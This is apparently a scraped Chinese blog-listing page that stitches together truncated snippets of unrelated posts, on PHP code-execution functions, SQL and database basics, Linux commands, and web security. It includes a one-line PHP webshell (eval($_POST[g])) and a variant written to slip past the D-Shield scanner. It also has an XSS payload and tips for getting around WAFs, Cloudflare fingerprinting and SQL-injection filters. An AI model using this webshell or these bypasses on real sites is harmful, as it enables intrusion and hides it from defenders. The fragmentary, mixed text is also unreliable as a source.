PHP常见的代码执行函数: eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() PHP常见的命 ...
转载
2021-10-29 11:39:00
1200阅读
2评论
一个很简单的一个技巧,作个笔记,可以绕过D盾检测。新建test1.php<?php
eval($_POST[g]);
?>新建test2.php<?php
$a="$_POST[g]";
eval($a=$a);
?>使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。那么问题就出现在eval($a=$a
原创
2023-05-03 09:58:52
161阅读
秒杀D盾
原创
2013-02-06 00:12:16
771阅读
Payload如下所示:<img src=# onerror=alert`2`>
原创
2017-07-04 20:21:27
4562阅读
1. 前言
在之前的项目中,发现一些网站使用不同的客户端会得到不同的结果,比如使用浏览器访问正常没问题,但使用python写脚本或者curl请求就会被拦截,当时也尝试数据包1:1还原,但还是不能解决。
测试指纹拦截站点:https://ascii2d.net
最近拜读了师傅的文章《绕过 Cloudflare 指纹护盾》,很有感触,感觉之前遇到的应该就是这个问题;之前写爬虫遇到类似这种指纹护盾(反爬
原创
2023-05-06 09:27:53
6051阅读
关系型数据库 关系型数据库:指采用了关系模型来组织数据的数据库。 直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsof ...
转载
2021-09-30 10:28:00
1043阅读
2评论
# 如何实现在 MySQL 数据库中创建一个新表
## 介绍
在本文中,我将向你展示如何在 MySQL 数据库中创建一个新表。无论你是刚入行的小白还是经验丰富的开发者,这篇文章都将帮助你完成这个任务。
## 流程
首先,让我们通过以下表格展示整个流程的步骤:
| 步骤 | 描述 |
| ------ | ------ |
| 1 | 连接到 MySQL 数据库 |
| 2 | 创建一个新的数
原创
2024-04-26 04:24:25
13阅读
盲注时绕过过滤方法 一、=被过滤 1、可以使用通配符like或者REGEXP 比如想要查询id为8的数据一般会使用select * from users where id=8; 等于被过滤的话可以使用 或者<、> 或者!(<>)不不等于 使用between 二、引号被过滤 使用十六进制 把单引号的内
转载
2020-08-21 14:06:00
381阅读
2评论
数据模型是用來描述数据、组织数据和对数据进行操作的。通俗地讲,数据模型就是现实世界的模拟。数据模型是数据库系统的核心和基础。一、两类数据模型 根据模型应用的不同目的,可以将这些模型划分为两大类,它们分别属于两个不同的层次。第一类是概念模型,第二类是逻辑模型和物理模型。 第一类概念模型(conce
转载
2023-12-13 22:42:54
61阅读
Linux必学的60个命令
Linux提供了大量的命令,利用它可以有效地完成大量的工 作,如磁盘操作、文件存
Linux提供了大量的命令,利用它可以有效地完成大量的工 作,如磁盘操作、文件存取、目录操作、进程管理、文件权限设定等。所以,在Linux系统上工作离不开使用系统提供的命令。要想真正理解Linux系统, 就必须从Linux命令学起,通过基础的命令学习可以
寻找注入点常见方式数字型 看/1 /0的区别字符型 看单引号的区别这次分享一个注入由报错发现 构造语句 bypass尝试 /1 /0 单引号的区别/1‘好家伙D盾拦截 小waf简单绕看到这里大家想到用啥方式绕过这waf 跑出数据呢这个方向和你们想的差不多 从报错信息入手我们来仔细分析一下这报错信息查询* 从 cms_xxxx表中*就不用我解释了吧发现我们的输入能直接拼接在查询
原创
2024-01-24 09:42:31
553阅读
# Redis数据库d1科普
## 简介
Redis(Remote Dictionary Server)是一个开源的内存数据库,属于NoSQL数据库的一种,它提供了键值对存储,并支持多种数据结构。Redis具有快速、可靠和灵活的特点,被广泛应用于缓存、消息队列、会话存储等领域。在本文中,我们将介绍Redis数据库d1的基本概念以及如何使用它。
## Redis数据库d1基本概念
Redis
原创
2024-05-14 05:26:58
32阅读
渗透过程就是各种安全技术的再现过程,本次渗透从SQL注入点的发现到绕过sql注入通用代码的防注入,可以说是打开了一扇门,通过sql注入获取管理员密码,获取数据库,如果在条件允许的情况下是完全可以获取webshell。在本文中还对access数据库获取webshell等关键技术进行了总结。
推荐
原创
2017-05-19 12:58:21
5553阅读
点赞
0x01 前言 之前发了一篇博客《Bypass D盾_IIS防火墙SQL注入防御(多
原创
2023-06-08 13:02:15
156阅读
同盾大数据平台一、平台首页1.1 创建作业进行编程1.1.1 创建作业1.1.2 编码时的注意事项1.1.2.1 一定要养成及时保存文件的习惯1.1.2.2 代码的运行与日志1.1.2.3 大数据平台没有代码调试功能1.1.2.4 要写注释,但尽量避免写中文注释1.1.2.5 自定义函数及将DataFrame写入到Hive表1.1.2.6 写for循环并且嵌套层次深时要“对称”写1.1.3 申请
转载
2023-10-20 22:17:12
174阅读
前言: 最近几天一直在折腾数据库存储,之前文章()介绍了Sqlite 数据库,SQLite是一种小型的轻量级的关系型数据库,不过直接用ios sdk提供的API来进行数据库开发,多多少少感觉不那么得心应手。后来也学了更加面向对象的CoreData数据库,不过coreData感觉对数据库的支持不太那么好,虽然操作方便,但是损失了性能以及效率,对于数据量比较大的app来说就有
转载
2024-08-21 16:41:13
27阅读
摘要一、基本操作题(1)从数据库投资管理中移除表“交易”(不是删除)。(2)将自由表“股票信息”添加到数据库“投资管理”中。(3)为表“股票信息”建立一个主索引,索引名和索引表达式均为“股票代码”。(4)为“股票信息”表的“股票代码”字段设置有效性规则,“规则”是:LEFT(股票代码,1)=”6II OR LEFT(股票代码,l)=”0”;错误提示信息是:“股票代码的第一位必须是6 或0”。答案:
转载
2024-04-23 12:38:40
20阅读
话的思路,我这写一下自己常用的思路与及具体方法,如有错误,还望大家斧正。上次很多师傅问我要的web漏扫的git...
原创
2023-07-27 21:53:21
0阅读
前言:在放假前,为了把服务器上的Oracle中移动到本机上,在童老师的指导下,顺利完成,肯定有些瑕疵 步骤: 1、使用pl/sql进入服务器上的数据库:1)导出dmp文件: 图一 图二 图二:注意,把你要导出的表全部选中,圈圈部分的记得要选择(有默认的),Output file保存在一个目录下,注意后缀是dmp文件,文件名自己命名;以下是我自己导出的文件,在E盘的根目录下: 图三 2)导
转载
2024-10-22 09:14:33
44阅读
SQLite数据库-Unity操作项目开发的时候,经常会遇到的一种需求,数据存储离线缓存的数据类型很多,大致分成两类字符串文本数据多媒体数据字符串数据的类型只有字符串,但是结构有很多:xmljsonmd5base64普通字符串多媒体数据的类型:图片(jpg,png,gif...)音频(mp3,aif...)视频(mp4,mpv)通常用数据库来存储字符串文本类型的数据,但是需要注意的是数据库同时也能
转载
2024-10-15 14:56:00
103阅读
